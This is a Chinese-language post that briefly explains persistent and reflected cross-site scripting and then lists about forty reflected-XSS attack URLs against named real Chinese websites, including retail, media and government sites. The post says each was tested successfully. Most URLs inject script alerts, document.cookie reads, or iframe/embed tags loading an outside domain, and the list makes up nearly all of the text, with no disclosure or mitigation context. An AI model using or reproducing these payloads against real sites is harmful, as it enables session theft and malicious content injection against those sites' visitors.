注：以下检测连接均在遨游浏览器测试成功。

  对一个网页来讲，XSS就是在未经授权的情况下，向里面插入内容，因为未经授权所以

就是漏洞。

  但大家更多的关注的不是授权，而是插入内容，这个内容经常带有危害性。

危害更多的是对访问这个页面的其他网民，你插入的代码，在我这儿运行，这些代码实

现很多东西。“在我这儿运行”意味着代码是有环境的，所以XSS必须立足于环境。是哪种情

况下的XSS，这才最关键。

  一般将XSS分为持久性和非持久性，两者都有打开某个链接然后自动运行代码(恶意构

造的参数)的特点，持久型就是代码保存在服务端的数据库，像一个网站的用户名，自我介

绍，密码等如果不做过滤就会存在XSS，当我访问你的页面，因为你的名字是一段代码，所

以我承受了这段代码，同时也承受了这段代码可能带来的损失；非持久型就是一个链接，链

接里面有参数，是一段代码，我点了之后浏览器打开这个链接，链接指向的程序执行这段代

码参数，然后返回给我运行结果，执行实质是以向程序提供代码参数做触发，是即时的。

 

第一个：铭万 B2B
http://search.b2b.cn/product/?k=%3cscript%3ealert(%27RC%27)%3c%2fscript%3e

第二个：凤凰网
http://my.ifeng.com/?c=friends&a=visit&ftype=6&friendName=%3C/title%3E%3Cscript%3Ealert('
RC')%3C/script%3E

第三个：中国电子网

http://search.21ic.com/so.php?keyword=%3Cscript%3Ealert%28document.cookie%29%
3C%2Fscript%3E

第四个：中华能源网

http://www.power-cn.cn/sample/search.asp?txtitle=<script>alert(document.cookie)</scr
ipt>

第五个：21CN
http://tags.21cn.com/tagsSearch?tags=%3Cscript%3Ealert()%3C/script%3E

第六个：中国知网

http://mall.cnki.net/magazine/articlesearch.aspx?keys=%3Ciframe%20src='http://www.chinaxiaoe.com'%3E%3C/iframe%3E

第七个：计算机世界

http://www.ccw.com.cn/search/search_article.php?keyword=%3C%2Fspan%3E%3Cifra
me+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E%3C%2Fiframe%3E

第八个：苏宁易购

http://www.suning.com/emall/Search?searchKeywords=%3Cembed%20SRC=HTTP://WWW.CHINAXIAOE.COM%3E%3C/EMBED%3E

第九个：安博教育 www.2cto.com

http://www.miiceic.org.cn/plus/search.php?keyword=%3Ciframe+src%3Dhttp%3A%2F
%2Fwww.chinaxiaoe.com%3E%3Ciframe%3E

第十个：拍拍

网http://sse1.paipai.com/s-kt11l4oxquvw6sgiqyujn3barq3jjsolru4karusi74j48goi311h338
kt1zn5ocpyvg6--1-48-80---3-4-3----2-2--128-0-0-PTAG,20084.2.2.html

第十一个：源码天空

http://www.codesky.net/article/search/?s=Random_Coder%3C%2Ftitle%3E%3Ciframe+
src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E%3C%2Fiframe%3E

第十二个：猫扑网

http://so.mop.com/s?q=%3C/title%3E%3Cembed%20src=Http://www.chinaxiaoe.com%3E%3C/em
bed%3E

第十三个：瑞丽女性网

http://search.rayli.com.cn/searchII.html?lxkw=%3C/span%3E%3Cembed%20src=http://
www.chinaxiaoe.com%3E%3C/embed%3E

第十四个：糯米网

http://www.nuomi.com/search?k=%3C%2Ftitle%3E%3Cembed+src%3DHttp%3A%2F%
2Fwww.chinaxiaoe.com%3E%3C%2Fembed%3E

第十五个：中彩网

http://app.zhcw.com/wwwroot/zhcw/jsp/indexSearch.jsp?query=Random_Coder%3C%2
Ftitle%3E%3Cembed+src%3DHttp%3A%2F%2Fwww.chinaxiaoe.com%3E&site=2&id=1

第十八个：太平洋网

http://ks.pconline.com.cn/index.jsp?q=%3C%2Ftitle%3E%3Cembed+src%3Dhttp%3A%
2F%2Fwww.chinaxiaoe.com%3E

第十九个：盘古搜索

http://news.panguso.com/newssearch.htm?orderType=1&q=%3C%2Ftitle%3E%3Cembe
d+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E

第二十个：7K7K 游戏

http://so.7k7k.com/game/1%22%2F%3E%3Cembed%20src%3Dhttp%3A%5C%2F%2Fwww.chinaxiaoe.com%3E.htm

第二十一个：移动搜索
http://202.85.216.217/query?qt=%3C/title%3E%3Cembed%20src=http://www.chinaxiaoe.com%3E

第二十二个：19 楼

http://www.19lou.com/search/thread?keyword=%3C%2Ftitle%3E%3Cembed%20src%3
Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E

第二十三个：中国日报

http://search.chinadaily.com.cn/all_en.jsp?searchText=%22%3E%3Cembed+src%3Dhttp
%3A%2F%2Fwww.chinaxiaoe.com%3E

第二十四个：电驴下载

http://www.verycd.com/search/entries/%3C%2Ftitle%3E%3Cembed%20src%3Dhttp%3
A%2F%2Fwww.chinaxiaoe.com%3E

第二十五个：天涯社区

http://search.tianya.cn/s?q=%3C%2Ftitle%3E%3Cembed%20src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E

第二十六个：华军软件园

http://search.newhua.com/search_list.php?searchname=%3C%2Ftitle%3E%3Cembed%
2F*%2Fsrc%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E

第二十八个：北斗手机网

http://mobile.139shop.com/brand/0/0_0_0-0-0-0-0-0_%3C/title%3E%3Cembed%20src=
http://www.chinaxiaoe.com%3E_001_1.htm

第二十九个：appchina

http://www.appchina.com/market/berry/search.action?q=%3Cembed+src%3Dhttp%3A
%2F%2Fwww.chinaxiaoe.com%3E

第三十个：友人网

http://user.younet.com/search/default.php?search_phone=\%22/%3E%3Cembed%20src
=http://www.chinaxiaoe.com%3E

第三十一个：麦包包

http://search.mbaobao.com/searcher?k=%3C%2Ftitle%3E%3Cembed+src%3Dhttp%3A
%2F%2Fwww.chinaxiaoe.com%3E

第三十二个：中粮我买网

http://www.womai.com/ProductList.htm?Keywords=%3C%2Ftitle%3E%3Cembed%2F*
%2Fsrc%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E

第三十三个：央广购物

http://www.cnrmall.com/tv/product/search.jsp?key=%22/%3E%3Cembed%20src=http:/
/www.chinaxiaoe.com%3E

第三十四个：满座网

http://s.manzuo.com/search?keyword=%22%2F%3E%3Cembed%20src%3Dhttp%3A%
2F%2Fwww.chinaxiaoe.com%3E

第三十五个：悠陶订餐网

http://www.utao365.com/search.php?encode=YTo1OntzOjg6ImNhdGVnb3J5IjtzOjE6IjAi
O3M6ODoia2V5d29yZHMiO3M6MzU6IjwvdGl0bGU%2bPGVtYmVkIHNyYz1odHRwOi8vdG1
4ay5vcmc%2bIjtzOjEyOiJpbWFnZUZpZWxkX3giO3M6MjoiMTkiO3M6MTI6ImltYWdlRmllbG
RfeSI7czoyOiIxMSI7czoxODoic2VhcmNoX2VuY29kZV90aW1lIjtpOjEzMzQzNzQ5ODI7fQ=
=

第三十六个：气象局：
http://www.cma.gov.cn:8080/was40/search?searchword=%3Cembed//src=http://www.chinaxiaoe.com%3E

第三十七个：交通部：
http://search.moc.gov.cn:8080/was40/search?searchword=%3Cembed//src=http://www.chinaxiaoe.com%3E
第三十八个：文化部：
http://app.mcprc.gov.cn:9000/was40/search?channelid=56599&searchword=%3Ciframe
%20src=http://www.chinaxiaoe.com%3E%3C/iframe%3E

第三十九个：中国人民银行：
http://www.pbc.gov.cn:8080/dig/Default.jsp?q=%22/%3E%3Ciframe%20src=http://www.chinaxiaoe.com%3E/iframe%3E

第四十个：中国电信
http://search.chinatelecom.com.cn/was40/search?searchword=%3Ciframe//src=http://www.chinaxiaoe.com%3E%3C/iframe%3E

第四十一个：中国共青团
http://www.gqt.org.cn/was40/search?channelid=17472&searchword=%3Ciframe//src=ht
tp://www.chinaxiaoe.com%3E%3C/iframe%3E

第四十二个：中央编译局
http://search.cctb.net:8081/utf8/search.jsp?channelid=76134&searchword=%3Ciframe//
src=http://www.chinaxiaoe.com%3E%3C/iframe%3E